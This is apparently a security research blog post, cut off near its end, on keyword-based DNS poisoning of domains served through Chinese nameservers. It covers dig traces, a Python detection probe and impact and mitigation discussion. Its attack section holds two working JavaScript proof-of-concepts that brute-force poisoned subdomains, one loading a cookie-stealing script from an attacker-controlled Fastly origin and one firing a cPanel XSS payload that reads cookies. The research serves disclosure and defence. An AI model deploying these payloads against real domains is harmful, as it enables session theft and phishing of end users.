At Assetnote, we are constantly resolving millions of DNS records as part of the operation of our Attack Surface Management platform. When performing DNS resolutions at the scale that we do, across the many diverse customer attack surfaces that we monitor, we start to notice some really interesting behavior in the wild.
Around two years ago, we had a new customer onboard with us who had a large presence in China. We started seeing an incredible number of subdomains that were resolving to what seemed like random IP addresses.
These subdomains did not seem "real", in the sense that they did not look like legitimate infrastructure that this company had set up. In addition to this, these records did not consistently resolve to the same IP address.
While we thought this was bizarre behavior at the time, we focus heavily on ensuring that the customers of our Attack Surface Management platform only see assets that are "real" (meaning we automatically filter out wildcards and other records that are resolving that aren't legitimately owned by the company).
We came up with a plan to strategically filter out these subdomains for this customer, and we put it down to some sort of weird DNS misconfiguration that was isolated to this customer. At the time, we did not realize that we had actually come across China's systematic approach to poisoning or tampering with DNS queries.
After experiencing this across a few customers, we investigated this issue further and understood that China's tampering with DNS queries is based on patterns within the subdomain.
In 2022, it was reported that the total number of Chinese domains had reached 33.8 million. This figure does not account for domains under all of the other TLDs that also route their DNS resolutions through Chinese infrastructure (e.g. AlibabaDNS, Cloudflare China, AWS Route53 China).
The attack vectors described in this blog post affect any domains that are being routed through Chinese infrastructure. It's hard to quantify the exact number of affected zones, but we estimate the number would be in the tens of millions.
After the discovery of this issue, we reviewed notes with Eric (todayisnew), who had independently found this issue and had spent a lot of time investigating it. Eric provided an additional exploitation vector that doesn't rely on the ability to claim a Fastly domain. You can skip to the attack vectors at the bottom of this blog post if you're not interested in the analysis.
We have also created an interactive tool to test if your domain is affected by this DNS poisoning issue, which can be found here.
Unreliable DNS Resolvers
Initially, we considered this inconsistency an outlier or a side-effect of unreliable DNS resolvers. By “unreliable” DNS resolvers we mean resolvers that would not respond consistently to our requests, returning different records, or no records, to the same request. We considered whether we were experiencing server-side load balancing of DNS records with methods such as DNS load balancing or IP load balancing; however, for these customers we concluded they were not using any of these features and we were experiencing genuinely “unreliable” DNS resolvers. We suspected this unreliability might come from other server-side load balancing algorithms, packet injection or packet tampering.
Note that unreliable DNS resolvers here refers to the authoritative name server for a DNS record, the server responsible for definitive answers about a given domain, in contrast to recursive resolvers that relay queries to authoritative DNS servers for you.
When our platform identifies a domain that resides on an unreliable authoritative DNS server, we typically perform further analysis to ensure that the subdomains are real. In this case, we found an interesting pattern: all domains belonging to the .cn TLD were being marked as unreliable.
Later, we realized that this poisoning was happening for other TLDs as well, as long as the nameservers that the domain used were located in China. This poisoning was not limited to domains with the .cn TLD.
Analysis
When debugging this DNS issue, we wanted to understand where exactly we were experiencing the inconsistency. Was it with our recursive resolvers or with the authoritative resolver?
❯ dig +trace 5-builtin.webproxy.idc-lorien21swww-web5245.bl.wwwytcos-linkpages.e.REDACTED.vn
; <<>> DiG 9.10.6 <<>> +trace 5-builtin.webproxy.idc-lorien21swww-web5245.bl.wwwytcos-linkpages.e.REDACTED.vn
;; global options: +cmd
. 515969 IN NS a.root-servers.net.
. 515969 IN NS b.root-servers.net.
. 515969 IN NS c.root-servers.net.
. 515969 IN NS d.root-servers.net.
. 515969 IN NS e.root-servers.net.
. 515969 IN NS f.root-servers.net.
. 515969 IN NS g.root-servers.net.
. 515969 IN NS h.root-servers.net.
. 515969 IN NS i.root-servers.net.
. 515969 IN NS j.root-servers.net.
. 515969 IN NS k.root-servers.net.
. 515969 IN NS l.root-servers.net.
. 515969 IN NS m.root-servers.net.
;; Received 525 bytes from 1.1.1.1#53(1.1.1.1) in 14 ms
sg. 172800 IN NS dsany3.sgnic.sg.
sg. 172800 IN NS dsany.sgnic.sg.
sg. 172800 IN NS ns4.apnic.net.
sg. 172800 IN NS pch.sgzones.sg.
sg. 172800 IN NS dsany2.sgnic.sg.
REDACTED.vn 3600 IN NS ns1.alibabadns.com.
REDACTED.vn 3600 IN NS ns2.alibabadns.com.
;; Received 655 bytes from 185.159.197.170#53(dsany2.sgnic.sg) in 129 ms
5-builtin.webproxy.idc-lorien21swww-web5245.bl.wwwytcos-linkpages.e.REDACTED.vn 180 IN A 47.88.58.234
;; Received 122 bytes from 140.205.103.194#53(ns2.alibabadns.com) in 482 ms
Walking the resolution tree, we can see that the domain above delegates to nameservers on alibabadns.com. Across multiple resolutions, we observed that the IP address was unstable:
assetnote@agent-1:~$ for i in $(seq 1 10); do dig 5-builtin.webproxy.idc-lorien21swww-web5245.bl.wwwytcos-linkpages.e.REDACTED.vn @ns2.alibabadns.com | grep ' IN A'; done
;5-builtin.webproxy.idc-lorien21swww-web5245.bl.wwwytcos-linkpages.e.REDACTED.vn. IN A
5-builtin.webproxy.idc-lorien21swww-web5245.bl.wwwytcos-linkpages.e.REDACTED.vn. 170 IN A 108.160.166.9
;5-builtin.webproxy.idc-lorien21swww-web5245.bl.wwwytcos-linkpages.e.REDACTED.vn. IN A
;5-builtin.webproxy.idc-lorien21swww-web5245.bl.wwwytcos-linkpages.e.REDACTED.vn. IN A
5-builtin.webproxy.idc-lorien21swww-web5245.bl.wwwytcos-linkpages.e.REDACTED.vn. 224 IN A 162.125.32.12
;5-builtin.webproxy.idc-lorien21swww-web5245.bl.wwwytcos-linkpages.e.REDACTED.vn. IN A
;5-builtin.webproxy.idc-lorien21swww-web5245.bl.wwwytcos-linkpages.e.REDACTED.vn. IN A
;5-builtin.webproxy.idc-lorien21swww-web5245.bl.wwwytcos-linkpages.e.REDACTED.vn. IN A
;5-builtin.webproxy.idc-lorien21swww-web5245.bl.wwwytcos-linkpages.e.REDACTED.vn. IN A
5-builtin.webproxy.idc-lorien21swww-web5245.bl.wwwytcos-linkpages.e.REDACTED.vn. 194 IN A 108.160.162.109
;5-builtin.webproxy.idc-lorien21swww-web5245.bl.wwwytcos-linkpages.e.REDACTED.vn. IN A
5-builtin.webproxy.idc-lorien21swww-web5245.bl.wwwytcos-linkpages.e.REDACTED.vn. 134 IN A 116.89.243.8
;5-builtin.webproxy.idc-lorien21swww-web5245.bl.wwwytcos-linkpages.e.REDACTED.vn. IN A
;5-builtin.webproxy.idc-lorien21swww-web5245.bl.wwwytcos-linkpages.e.REDACTED.vn. IN A
Diving deeper, we tried to create a minimal reproducible example, and managed to distill it down to any query including webproxy.id. Later, we would find out that there were a number of “keywords” that would be intercepted.
assetnote@agent-1:~$ for i in $(seq 1 10); do dig webproxy.id.REDACTED.vn @ns2.alibabadns.com | egrep 'IN\s+A'; done
;webproxy.id.REDACTED.vn. IN A
webproxy.id.REDACTED.vn. 104 IN A 128.242.245.43
;webproxy.id.REDACTED.vn. IN A
webproxy.id.REDACTED.vn. 231 IN A 65.49.26.98
;webproxy.id.REDACTED.vn. IN A
webproxy.id.REDACTED.vn. 203 IN A 199.59.149.237
;webproxy.id.REDACTED.vn. IN A
webproxy.id.REDACTED.vn. 107 IN A 199.59.148.9
;webproxy.id.REDACTED.vn. IN A
;webproxy.id.REDACTED.vn. IN A
webproxy.id.REDACTED.vn. 133 IN A 108.160.165.173
;webproxy.id.REDACTED.vn. IN A
webproxy.id.REDACTED.vn. 98 IN A 182.50.139.56
;webproxy.id.REDACTED.vn. IN A
webproxy.id.REDACTED.vn. 171 IN A 173.208.182.68
;webproxy.id.REDACTED.vn. IN A
;webproxy.id.REDACTED.vn. IN A
However, it turns out that the domain doesn’t even need to exist for us to receive invalid responses (please don’t buy this domain to prove us wrong). For this domain we would expect the server to always return NXDOMAIN or REFUSED; however, it sometimes does return a response. Additionally, the domain looked up didn’t have to be under .cn as we initially expected: it only had to contain a keyword and be answered by an authoritative nameserver hosted in China (or so we suspected).
assetnote@agent-1:~$ for i in $(seq 1 10); do dig webproxy.id.1-2-3-4-5-6-7-CERTAINLYAUNIQUEDOMAIN.com @ns2.alibabadns.com | egrep 'IN\s+A'; done
;webproxy.id.1-2-3-4-5-6-7-CERTAINLYAUNIQUEDOMAIN.com. IN A
;webproxy.id.1-2-3-4-5-6-7-CERTAINLYAUNIQUEDOMAIN.com. IN A
webproxy.id.1-2-3-4-5-6-7-CERTAINLYAUNIQUEDOMAIN.com. 80 IN A 108.160.167.148
;webproxy.id.1-2-3-4-5-6-7-CERTAINLYAUNIQUEDOMAIN.com. IN A
;webproxy.id.1-2-3-4-5-6-7-CERTAINLYAUNIQUEDOMAIN.com. IN A
webproxy.id.1-2-3-4-5-6-7-CERTAINLYAUNIQUEDOMAIN.com. 72 IN A 199.59.149.244
;webproxy.id.1-2-3-4-5-6-7-CERTAINLYAUNIQUEDOMAIN.com. IN A
;webproxy.id.1-2-3-4-5-6-7-CERTAINLYAUNIQUEDOMAIN.com. IN A
;webproxy.id.1-2-3-4-5-6-7-CERTAINLYAUNIQUEDOMAIN.com. IN A
;webproxy.id.1-2-3-4-5-6-7-CERTAINLYAUNIQUEDOMAIN.com. IN A
;webproxy.id.1-2-3-4-5-6-7-CERTAINLYAUNIQUEDOMAIN.com. IN A
;webproxy.id.1-2-3-4-5-6-7-CERTAINLYAUNIQUEDOMAIN.com. IN A
webproxy.id.1-2-3-4-5-6-7-CERTAINLYAUNIQUEDOMAIN.com. 221 IN A 199.59.148.96
We also suspected that this was isolated to a single DNS resolver. However, we soon found another customer exhibiting the same behavior, except that they used Cloudflare for their DNS, which perplexed us even more.
assetnote@agent-1:~$ dig webproxy.id.32323232323232323232.REDACTED2.cn @ns45.dns.cf-ns.com
; <<>> DiG 9.18.18-0ubuntu0.22.04.1-Ubuntu <<>> webproxy.id.32323232323232323232.REDACTED2.cn @ns45.dns.cf-ns.com
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 35477
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 0
;; QUESTION SECTION:
;webproxy.id.32323232323232323232.REDACTED2.cn. IN A
;; ANSWER SECTION:
webproxy.id.32323232323232323232.REDACTED2.cn. 229 IN A 199.59.150.43
;; Query time: 204 msec
;; SERVER: 119.0.67.92#53(ns45.dns.cf-ns.com) (UDP)
;; WHEN: Mon Nov 20 00:31:52 UTC 2023
;; MSG SIZE rcvd: 75
We could confirm that keyword interception was in place, because weproxy.id would consistently return NXDOMAIN as expected, while an entirely non-existent domain containing webproxy.id would return records.
assetnote@agent-1:~$ for i in $(seq 1 10); do dig webproxy.id.REDACTED2.cn @ns45.dns.cf-ns.com. | egrep 'IN\s+A'; done
;webproxy.id.REDACTED2.cn. IN A
webproxy.id.REDACTED2.cn. 69 IN A 202.160.128.40
;webproxy.id.REDACTED2.cn. IN A
webproxy.id.REDACTED2.cn. 191 IN A 31.13.95.48
;webproxy.id.REDACTED2.cn. IN A
webproxy.id.REDACTED2.cn. 203 IN A 192.133.77.191
;webproxy.id.REDACTED2.cn. IN A
webproxy.id.REDACTED2.cn. 127 IN A 67.228.102.32
;webproxy.id.REDACTED2.cn. IN A
webproxy.id.REDACTED2.cn. 95 IN A 104.244.46.57
;webproxy.id.REDACTED2.cn. IN A
webproxy.id.REDACTED2.cn. 244 IN A 103.214.168.106
;webproxy.id.REDACTED2.cn. IN A
webproxy.id.REDACTED2.cn. 113 IN A 104.244.46.208
;webproxy.id.REDACTED2.cn. IN A
webproxy.id.REDACTED2.cn. 144 IN A 103.39.76.66
;webproxy.id.REDACTED2.cn. IN A
webproxy.id.REDACTED2.cn. 78 IN A 192.133.77.189
;webproxy.id.REDACTED2.cn. IN A
webproxy.id.REDACTED2.cn. 106 IN A 59.188.250.54
assetnote@agent-1:~$ for i in $(seq 1 10); do dig weproxy.id.REDACTED2.cn @ns45.dns.cf-ns.com. | egrep 'IN\s+A'; done
;weproxy.id.REDACTED2.cn. IN A
;weproxy.id.REDACTED2.cn. IN A
;weproxy.id.REDACTED2.cn. IN A
;weproxy.id.REDACTED2.cn. IN A
;weproxy.id.REDACTED2.cn. IN A
;weproxy.id.REDACTED2.cn. IN A
;weproxy.id.REDACTED2.cn. IN A
;weproxy.id.REDACTED2.cn. IN A
;weproxy.id.REDACTED2.cn. IN A
;weproxy.id.REDACTED2.cn. IN A
assetnote@agent-1:~$ for i in $(seq 1 10); do dig webproxy.id.1-2-3-4-5-6-7-CERTAINLYAUNIQUEDOMAIN.com @ns45.dns.cf-ns.com. | egrep 'IN\s+A'; done
;webproxy.id.1-2-3-4-5-6-7-CERTAINLYAUNIQUEDOMAIN.com. IN A
webproxy.id.1-2-3-4-5-6-7-CERTAINLYAUNIQUEDOMAIN.com. 175 IN A 157.240.8.50
;webproxy.id.1-2-3-4-5-6-7-CERTAINLYAUNIQUEDOMAIN.com. IN A
webproxy.id.1-2-3-4-5-6-7-CERTAINLYAUNIQUEDOMAIN.com. 214 IN A 157.240.21.9
;webproxy.id.1-2-3-4-5-6-7-CERTAINLYAUNIQUEDOMAIN.com. IN A
webproxy.id.1-2-3-4-5-6-7-CERTAINLYAUNIQUEDOMAIN.com. 76 IN A 162.125.80.5
;webproxy.id.1-2-3-4-5-6-7-CERTAINLYAUNIQUEDOMAIN.com. IN A
webproxy.id.1-2-3-4-5-6-7-CERTAINLYAUNIQUEDOMAIN.com. 156 IN A 173.244.217.42
;webproxy.id.1-2-3-4-5-6-7-CERTAINLYAUNIQUEDOMAIN.com. IN A
webproxy.id.1-2-3-4-5-6-7-CERTAINLYAUNIQUEDOMAIN.com. 211 IN A 108.160.162.102
;webproxy.id.1-2-3-4-5-6-7-CERTAINLYAUNIQUEDOMAIN.com. IN A
webproxy.id.1-2-3-4-5-6-7-CERTAINLYAUNIQUEDOMAIN.com. 183 IN A 162.125.18.133
;webproxy.id.1-2-3-4-5-6-7-CERTAINLYAUNIQUEDOMAIN.com. IN A
webproxy.id.1-2-3-4-5-6-7-CERTAINLYAUNIQUEDOMAIN.com. 137 IN A 185.45.7.185
;webproxy.id.1-2-3-4-5-6-7-CERTAINLYAUNIQUEDOMAIN.com. IN A
webproxy.id.1-2-3-4-5-6-7-CERTAINLYAUNIQUEDOMAIN.com. 244 IN A 103.252.114.11
;webproxy.id.1-2-3-4-5-6-7-CERTAINLYAUNIQUEDOMAIN.com. IN A
webproxy.id.1-2-3-4-5-6-7-CERTAINLYAUNIQUEDOMAIN.com. 209 IN A 174.37.243.85
;webproxy.id.1-2-3-4-5-6-7-CERTAINLYAUNIQUEDOMAIN.com. IN A
webproxy.id.1-2-3-4-5-6-7-CERTAINLYAUNIQUEDOMAIN.com. 140 IN A 108.160.163.108
Coming back to our original question: was this a recursive resolver or an authoritative resolver issue? It turns out the answer is neither! But something fishy is happening at the authoritative nameserver level. Attempting to resolve our entirely made-up domain against Cloudflare’s nameservers, we find that the expected REFUSED response for a non-existent domain (weproxy.id…) is replaced with NOERROR when the keyword is present. We therefore suspect that any resolution crossing the Great Firewall of China with specific keywords would be poisoned.
assetnote@agent-1:~$ dig webproxy.id.1-2-3-4-5-6-7-CERTAINLYAUNIQUEDOMAIN.com @ns45.dns.cf-ns.com.
; <<>> DiG 9.18.18-0ubuntu0.22.04.1-Ubuntu <<>> webproxy.id.1-2-3-4-5-6-7-CERTAINLYAUNIQUEDOMAIN.com @ns45.dns.cf-ns.com.
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 29229
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 0
;; QUESTION SECTION:
;webproxy.id.1-2-3-4-5-6-7-CERTAINLYAUNIQUEDOMAIN.com. IN A
;; ANSWER SECTION:
webproxy.id.1-2-3-4-5-6-7-CERTAINLYAUNIQUEDOMAIN.com. 190 IN A 31.13.67.33
;; Query time: 156 msec
;; SERVER: 61.159.93.124#53(ns45.dns.cf-ns.com.) (UDP)
;; WHEN: Mon Nov 20 00:35:54 UTC 2023
;; MSG SIZE rcvd: 86
assetnote@agent-1:~$ dig weproxy.id.1-2-3-4-5-6-7-CERTAINLYAUNIQUEDOMAIN.com @ns45.dns.cf-ns.com.
; <<>> DiG 9.18.18-0ubuntu0.22.04.1-Ubuntu <<>> weproxy.id.1-2-3-4-5-6-7-CERTAINLYAUNIQUEDOMAIN.com @ns45.dns.cf-ns.com.
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: REFUSED, id: 876
;; flags: qr rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1
;; WARNING: recursion requested but not available
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 512
; EDE: 20 (Not Authoritative)
;; QUESTION SECTION:
;weproxy.id.1-2-3-4-5-6-7-CERTAINLYAUNIQUEDOMAIN.com. IN A
;; Query time: 180 msec
;; SERVER: 61.159.93.124#53(ns45.dns.cf-ns.com.) (UDP)
;; WHEN: Mon Nov 20 00:36:04 UTC 2023
;; MSG SIZE rcvd: 86
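The keyword-versus-control check performed above with dig, as an added Python example (not Assetnote's tooling): it sends A queries straight to an authoritative server, extracts the rcode and answers, and classifies repeated probes as poisoned, wildcard or clean. The zone example.com, the constructed responses in the offline demo and the KNOWN_POISON_POOL (a few addresses copied from the appendix at the end of the post) are assumptions made here; probe() is the only function that touches the network and is not called by the demo.

```python
"""Keyword-vs-control probe for DNS poisoning at an authoritative nameserver.
Added example, not Assetnote's tooling: query a random label containing a suspected
keyword and a control label with the keyword misspelled (webproxy.id vs weproxy.id),
as the dig loops above do, and compare the answers. Standard library only."""
import random
import socket
import string
import struct

RCODES = {0: "NOERROR", 2: "SERVFAIL", 3: "NXDOMAIN", 5: "REFUSED"}
# A handful of addresses copied from the poisoned-IP appendix of the post.
KNOWN_POISON_POOL = {"199.59.150.43", "31.13.67.33", "108.160.166.9",
                     "162.125.32.12", "104.244.46.57", "103.252.114.11"}

def encode_name(name: str) -> bytes:
    labels = name.rstrip(".").split(".")
    return b"".join(bytes([len(lb)]) + lb.encode() for lb in labels) + b"\x00"

def build_query(name: str, qid: int) -> bytes:
    """A/IN query with RD set, as dig sends it."""
    return struct.pack(">HHHHHH", qid, 0x0100, 1, 0, 0, 0) + encode_name(name) + struct.pack(">HH", 1, 1)

def build_response(name: str, qid: int, rcode: str, ips=(), ttl: int = 60) -> bytes:
    """Constructed response, used only for the offline demo and tests."""
    code = {v: k for k, v in RCODES.items()}[rcode]
    msg = struct.pack(">HHHHHH", qid, 0x8180 | code, 1, len(ips), 0, 0) + encode_name(name) + struct.pack(">HH", 1, 1)
    for ip in ips:  # owner name = compression pointer to the question name at offset 12
        msg += b"\xc0\x0c" + struct.pack(">HHIH", 1, 1, ttl, 4) + socket.inet_aton(ip)
    return msg

def _skip_name(msg: bytes, off: int) -> int:
    while True:
        length = msg[off]
        if length == 0:
            return off + 1
        if length & 0xC0 == 0xC0:  # compression pointer ends the name
            return off + 2
        off += 1 + length

def parse_response(msg: bytes):
    """Return (rcode, [A-record IPs]) from a raw DNS response."""
    _, flags, qdcount, ancount, _, _ = struct.unpack(">HHHHHH", msg[:12])
    rcode = RCODES.get(flags & 0x0F, f"RCODE{flags & 0x0F}")
    off = 12
    for _ in range(qdcount):
        off = _skip_name(msg, off) + 4  # skip QTYPE and QCLASS
    ips = []
    for _ in range(ancount):
        off = _skip_name(msg, off)
        rtype, _, _, rdlen = struct.unpack(">HHIH", msg[off:off + 10])
        off += 10
        if rtype == 1 and rdlen == 4:
            ips.append(socket.inet_ntoa(msg[off:off + 4]))
        off += rdlen
    return rcode, ips

def probe(name: str, ns_ip: str, timeout: float = 3.0):
    """One live query sent straight to an authoritative server (dig name @ns_ip)."""
    qid = random.randrange(1 << 16)
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.settimeout(timeout)
        sock.sendto(build_query(name, qid), (ns_ip, 53))
        data, _ = sock.recvfrom(4096)
    return parse_response(data)

def random_label(n: int = 10) -> str:
    return "".join(random.choices(string.ascii_lowercase + string.digits, k=n))

def control_keyword(keyword: str) -> str:
    """Drop the third character (webproxy.id -> weproxy.id) so only the keyword changes."""
    return keyword[:2] + keyword[3:]

def classify(keyword_results, control_results) -> str:
    """WILDCARD: the control label answers too (a real wildcard, not poisoning).
    POISONED: the control is negative but the keyword label still gets A records.
    CLEAN: neither label gets an answer."""
    kw_ips = {ip for rc, ips in keyword_results if rc == "NOERROR" for ip in ips}
    ctl_ips = {ip for rc, ips in control_results if rc == "NOERROR" for ip in ips}
    if ctl_ips:
        return "WILDCARD"
    return "POISONED" if kw_ips else "CLEAN"

def pool_overlap(results) -> set:
    """Answers that already appear in the known poisoned pool."""
    return {ip for rc, ips in results if rc == "NOERROR" for ip in ips} & KNOWN_POISON_POOL

def demo_offline(zone: str = "example.com", keyword: str = "webproxy.id"):
    """Constructed run mirroring the dig output above: rotating answers for the
    keyword label, REFUSED for the misspelled control label."""
    kw = [parse_response(build_response(f"{random_label()}.{keyword}.{zone}", 1, "NOERROR", [ip]))
          for ip in ("199.59.150.43", "31.13.67.33", "108.160.166.9")]
    kw.append(parse_response(build_response(f"{random_label()}.{keyword}.{zone}", 2, "REFUSED")))
    ctl = [parse_response(build_response(f"{random_label()}.{control_keyword(keyword)}.{zone}", 3, "REFUSED"))
           for _ in range(4)]
    return classify(kw, ctl), pool_overlap(kw)

if __name__ == "__main__":
    verdict, overlap = demo_offline()
    print(verdict, sorted(overlap))
```

For a live check, call probe() several times for `<random>.<keyword>.<zone>` and for the control label against the zone's authoritative nameserver IP, then pass both lists to classify(). Repeating the probes matters because, as the loops above show, the injected answer arrives only some of the time; the WILDCARD branch is what separates this condition from the legitimate wildcard records the platform already filters out.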
It turns out there is already literature published on this very topic.
Finding the bad IP addresses was a simple affair of resolving enough domains to sample which IP addresses were in the pool of returned answers. It turns out that there is a finite set of IPs that can be returned.
We have attached a list of the known poisoned IPs to the end of this post, along with the corresponding whois information we pulled for these IPs. Although the research from Hoang et al. identifies over 1700 IP addresses, we suspect our list differs due to the narrower scope of keywords we are resolving, or more simply because a different list was in use at that point in time.
Conversely, bad keywords could be identified by performing reverse DNS lookups on these IPs and seeing which nonsensical domain names point to IPs known to belong to a single host.
Knowing that we can include a specific string in a subdomain and have it resolve to a set of IP addresses that respond to HTTP requests, we dove into the possibilities of how an attacker could potentially use this to their advantage.
The first and most powerful technique we discovered related to Fastly. A number of the IP addresses returned by China's poisoning were found to belong to Fastly. When you visit these poisoned subdomains in your browser, you get an error message from Fastly stating that no CDN profile has that domain configured.
The default behavior of Fastly's CDN is that any customer can add a domain to their CDN profile. Once a domain has been claimed by one customer, it cannot be used on another Fastly account.
This was the only prerequisite for exploiting the poisoning: the targeted domain must not already have been added to Fastly by another customer.
By registering a Fastly account, creating a CDN profile, and then adding *.domain.tld to the configuration, it was possible to serve all requests for any subdomain of that domain whenever the requests were served by Fastly.
But how do we practically exploit this in the wild? How do we take advantage of controlling the origin for our target in the browser? The subdomains are clearly resolving to different IPs and are constantly rotating.
The first step is pointing the Fastly CDN profile at your server's IP as its origin server, so that all requests for *.domain.tld are routed to your server. After doing so, host an image on your server, which will aid us in our exploitation process.
Since the subdomain poisoning patterns are predictable, we can leverage some client side code to generate a list of random subdomains that will lead to poisoned responses. While we do not know which subdomain will eventually point to Fastly, we can simply load up an image from all of the random subdomains until we win, leveraging event handlers to notify us about the successful poison.
<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Image Loading</title>
</head>
<body>
<script>
  // Function to generate a random string of length 10
  function generateRandomString() {
    let randomString = '';
    for (let i = 0; i < 10; i++) {
      randomString += Math.random().toString(36).charAt(2) + Math.random().toString(36).charAt(2);
    }
    return randomString;
  }

  // Function to handle image onload event
  function onLoad(event) {
    let imageUrl = event.target.src;
    alert(`Image loaded successfully: ${imageUrl}`);
    let origHost = new URL(imageUrl).host;
    let randomString = generateRandomString();
    let scriptUrl = `http://${origHost}/cookie.php?${randomString}=yespls`;
    let scriptTag = document.createElement('script');
    scriptTag.src = scriptUrl;
    scriptTag.onload = onLoadAgain;
    document.head.appendChild(scriptTag);
  }

  function onLoadAgain(event) {
    let scriptUrl = event.target.src;
    alert(`Script loaded successfully: ${scriptUrl}`);
    alert(`Cookie: ${window.cookiestolen}`);
  }

  // Function to handle image onerror event
  function onError(event) {
    console.error(`Image failed to load: ${event.target.src}`);
  }

  // Generate thousands of random strings and create img tags with onerror and onload handlers
  for (let i = 0; i < 1000; i++) {
    let randomString = generateRandomString();
    let imageUrl = `http://${randomString}.webproxy.idc.target.vn/slowly.png`;
    let imgTag = document.createElement('img');
    imgTag.src = imageUrl;
    imgTag.onerror = onError;
    imgTag.onload = onLoad;
    document.body.appendChild(imgTag);
  }
</script>
</body>
</html>
When speaking with Eric about the Chinese DNS poisoning issue, he shared a proof of concept that was more universal than our Fastly proof-of-concept but had a slightly lower impact, as you cannot capture HTTPOnly cookies.
Eric let us know that he had spent over 100 hours on this issue from a research perspective, coming to similar conclusions to us that it affects any domain that is routed through China. He was keen for this issue to be discussed more widely and with his permission we are including the proof-of-concept he created to demonstrate the risks of DNS poisoning from China.
This proof-of-concept relies on the fact that one of the IPs within the pool of IPs returned through the poisoning will be running a vulnerable version of cPanel, leading to XSS. It will iterate through generated subdomains until the XSS fires.
We have simplified Eric's proof-of-concept and our version can be found below:
<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Image Loading</title>
</head>
<body>
<script>
  // Function to generate a random string of length 10
  function generateRandomString() {
    let randomString = '';
    for (let i = 0; i < 10; i++) {
      randomString += Math.random().toString(36).charAt(2) + Math.random().toString(36).charAt(2);
    }
    return randomString;
  }

  let imageElements = [];

  // Function to handle image onload event
  function onLoad(event) {
    let imageUrl = event.target.src;
    alert(`Image loaded successfully: ${imageUrl}`);
    let origHost = new URL(imageUrl).host;
    let randomString = generateRandomString();
    let newUrl = `http://${origHost}/cpanelwebcall/<img%20src=x%20onerror=alert(document.location+document.cookie)>`;
    // Create an iframe and load the URL
    let iframe = document.createElement('iframe');
    iframe.src = newUrl;
    iframe.style.width = '500px';
    iframe.style.height = '300px';
    document.body.appendChild(iframe);
  }

  // Function to handle image onerror event
  function onError(event) {
    console.error(`Image failed to load: ${event.target.src}`);
  }

  // Function to cancel loading of current images
  function cancelCurrentImages() {
    imageElements.forEach(img => {
      img.src = ''; // Clear the src attribute
      img.remove(); // Remove the image element from the DOM
    });
    imageElements = []; // Clear the array for the next batch
  }

  // Function to load a batch of images
  function loadBatch(batchNumber) {
    if (batchNumber > 0) {
      cancelCurrentImages(); // Cancel loading of previous batch
    }
    for (let i = 0; i < 100; i++) { // Load 100 images per batch
      let randomString = generateRandomString();
      let imageUrl = `http://${randomString}.morphium.info.test2.target.cn:2095/unprotected/cpanel/images/webmail-logo.svg`;
      let imgTag = document.createElement('img');
      imgTag.src = imageUrl;
      imgTag.onerror = onError;
      imgTag.onload = onLoad;
      document.body.appendChild(imgTag);
      imageElements.push(imgTag); // Add the image element to the array
    }
    if (batchNumber < 10) { // Total 10 batches to make 1000 images
      setTimeout(() => loadBatch(batchNumber + 1), 3000); // Wait for 3 seconds before next batch
    }
  }

  // Start loading images in batches
  loadBatch(0);
</script>
</body>
</html>
What is the impact?
As this vulnerability is effectively the same as a subdomain takeover, the same impacts that affect typical subdomain takeover vulnerabilities apply. There were two separate exploitation vectors described in this blog post and they both have slightly different impacts.
With the Fastly takeover technique, you are able to listen to all traffic that gets routed to your origin. This is more impactful than just an XSS vulnerability, as it means that it will be possible to steal HTTPOnly cookies which are not made available to JavaScript.
Typically, this would be even more impactful if existing infrastructure was making calls to the subdomain that has been taken over, but due to the dynamic nature of these subdomains, the chances of this are slim. The real value of this attack vector is still client-facing, attacking end users.
Unfortunately, this attack's prerequisite is that the domain must not be taken on Fastly already. This may prevent attackers from being able to exploit this issue successfully for some high profile domains that legitimately use Fastly.
Alternatively, the cPanel XSS vector is much more universal and works on any domain affected by China's poisoning. The only noticeable difference between the Fastly vector and this one is that it is not possible to steal HTTPOnly cookies.
For both attack vectors, it is not possible to steal cookies that have been marked as "Secure", as they will only be transmitted when the communication with the origin is over HTTPS. There are angles involving a self-signed certificate, but they would require the user to explicitly ignore certificate warnings.
There may be a way to claim a TLS certificate if you are able to retry a subdomain enough times with the certificate provider until it hits your Fastly origin, but this wasn't immediately possible with our testing.
Of course, as with any cross-site scripting attack, it is possible to phish users and perform any other type of client side attack while you have the origin of *.target.tld. Depending on the configuration of the target's web applications, cookie stealing or cross-application interactions may be possible.
Theories Explaining This Behaviour
On the surface, this behavior is very odd and we began to wonder why this infrastructure operated this way. Based on our analysis of the keywords that trigger this behavior (see Appendix below), it seems that the most logical theory is that this is simply a censorship mechanism.
Our leading theory is that the Great Firewall inside China is manipulating DNS responses due to blacklisted or blocked keywords. This affects any system that has to pass through the Great Firewall before it reaches the end-user/client. Most of the keywords relate to VPN software, proxies, adult sites, file and text sharing and torrents. This is consistent with the kinds of material that China is known to censor within its borders.
This theory is also supported by the behaviour of the keyword filtering, which appears to be greedy. Rather than blocking a specific single domain such as, say, tracker.thepiratebay.org, this system appears to trigger if the keyword is embedded anywhere in the domain. This is why we saw poisoned DNS responses for non-existent domains.
This does raise the question: if censorship is the goal, why not simply sinkhole to a non-functional IP address? This one is a bit harder to answer. There is a lot of diversity in the networks that the IPs in these poisoned records point to: infrastructure for large social media networks, CDNs, cloud platforms and even random blogs. Our best guess is that this is simply random and not intentional, and that the prevalence of these sorts of organizations reflects that they are more likely to own a large IP space.
What Can Be Done to Mitigate the Risk?
Unfortunately there is no simple way for organizations to address this risk. Operating infrastructure in China is not as simple as signing up to some hosting provider in China with a credit card. Any business that wants to host in China or even have any kind of Internet presence inside China needs to apply for and obtain a valid Chinese Internet Content Provider (ICP) license before anything can be hosted.
There are a number of very specific requirements to have this license including:
You must have a domain name registered with a Chinese domain name registrar.
You must use servers located in China.
You must use a hosting provider that is licensed by the Chinese government.
